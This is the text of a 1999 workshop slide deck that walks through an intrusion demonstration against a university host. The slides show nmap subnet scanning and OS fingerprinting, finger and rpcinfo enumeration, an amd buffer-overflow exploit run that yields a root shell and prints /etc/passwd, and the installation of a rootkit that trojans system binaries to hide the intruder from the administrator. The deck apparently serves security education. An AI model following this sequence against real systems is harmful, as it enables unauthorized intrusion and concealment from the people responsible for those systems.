Download presentation
Presentation is loading. Please wait.
1
Taeho Oh/PLUS 3rd CONCERT Workshop Nov. 1999 Intrusion demonstration Part I Postech PLUS Taeho Oh (PLUS015) ohhara@postech.edu
2
Taeho Oh/PLUS 3rd CONCERT Workshop Nov. 1999 Contents Scan wide area network –Using powerful network scanner, nmap –Find the running hosts in the network –Gather the host information Get root permission from the target host Hide himself from the admin
3
Taeho Oh/PLUS 3rd CONCERT Workshop Nov. 1999 Scan wide area network (1) Using powerful network scanner, nmap –nmap can do ftp bounce scan, stealth scan, OS prediction, and so on. –http://www.insecure.org/nmap
4
Taeho Oh/PLUS 3rd CONCERT Workshop Nov. 1999 Scan wide area network (2) Find the running hosts in the network [ root@ohhara ~ ] {1} # nmap -sP "141.223.xxx.*" Host (141.223.xxx.0) appears to be up. Host (141.223.xxx.0) seems to be a subnet broadcast address (returned 111 extra pings). Skipping host. Host kwxnxoo.postech.ac.kr (141.223.xxx.7) appears to be up. Host xojx.postech.ac.kr (141.223.xxx.9) appears to be up. (... ) Host victim.postech.ac.kr (141.223.xxx.75) appears to be up. Host xstxos.postech.ac.kr (141.223.xxx.77) appears to be up. Host anxelx.postech.ac.kr (141.223.xxx.78) appears to be up. Host mxrlxns.postech.ac.kr (141.223.xxx.79) appears to be up. Host (141.223.xxx.99) appears to be up. Host (141.223.xxx.255) appears to be up. Host (141.223.xxx.255) seems to be a subnet broadcast address (returned 93 extra pings). Skipping host. Nmap run completed -- 256 IP addresses (27 hosts up) scanned in 2 seconds
5
Taeho Oh/PLUS 3rd CONCERT Workshop Nov. 1999 Scan wide area network (3) Gather the host information [ root@ohhara ~ ] {2} # nmap -I -O 141.223.121.75 Interesting ports on victim.postech.ac.kr (141.223.xxx.75): Port State Protocol Service Owner 21 open tcp ftp root 23 open tcp telnet root 25 open tcp smtp root 53 open tcp domain root 79 open tcp finger root 80 open tcp http nobody (... ) 6000 open tcp X11 root TCP Sequence Prediction: Class=random positive increments Difficulty=2098031 (Good luck!) Remote operating system guess: Linux 2.1.122 - 2.1.132; 2.2.0-pre1 - 2.2.2 Nmap run completed -- 1 IP address (1 host up) scanned in 19 seconds
6
Taeho Oh/PLUS 3rd CONCERT Workshop Nov. 1999 Scan wide area network (4) Gather the host information [ root@ohhara ~ ] {3} # finger @141.223.xxx.75 [141.223.xxx.75] Login Name Tty Idle Login Time Office Office Phone kotaeji Kim Taehyung /0 20:46 Oct 27 19:41 [ root@ohhara ~ ] {4} # rpcinfo -p 141.223.xxx.75 program vers proto port 100000 2 tcp 111 rpcbind 100000 2 udp 111 rpcbind (... ) 100021 1 udp 1026 nlockmgr 100021 3 udp 1026 nlockmgr 100021 1 tcp 1024 nlockmgr 100021 3 tcp 1024 nlockmgr 300019 1 tcp 878 amd 300019 1 udp 879 amd
7
Taeho Oh/PLUS 3rd CONCERT Workshop Nov. 1999 Get root permission from the target host Get root with amd buffer overflow exploit [ root@ohhara ~ ] {5} #./amd-ex 141.223.xxx.75 Attack 141.223.xxx.75 amq: could not start new autmount point: Connection timed out Connect to the shell Linux victim 2.2.5-22 #1 Wed Jun 2 09:17:03 EDT 1999 i686 unknown uid=0(root) gid=0(root) id uid=0(root) gid=0(root) cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown (... )
8
Taeho Oh/PLUS 3rd CONCERT Workshop Nov. 1999 Hide himself from the admin Install rootkit Trojan files of ohhara rootkit –chgrp, chmod, chown, cp, ln, ls, mkdir, mknod, netstat, ps, touch, dir, du, find, mkfifo, oldps, top, vdir, fixdate, in.inetd, in.smbd, in.telnetd, pam.pwdb.so [ root@victim ~ ] {1} # tar -xzf ohhara-rootkit.tar.gz [ root@victim ~ ] {2} # cd ohhara-rootkit [ root@victim ~/ohhara-rootkit ] {3} #./install-ohhara-rootkit
Similar presentations
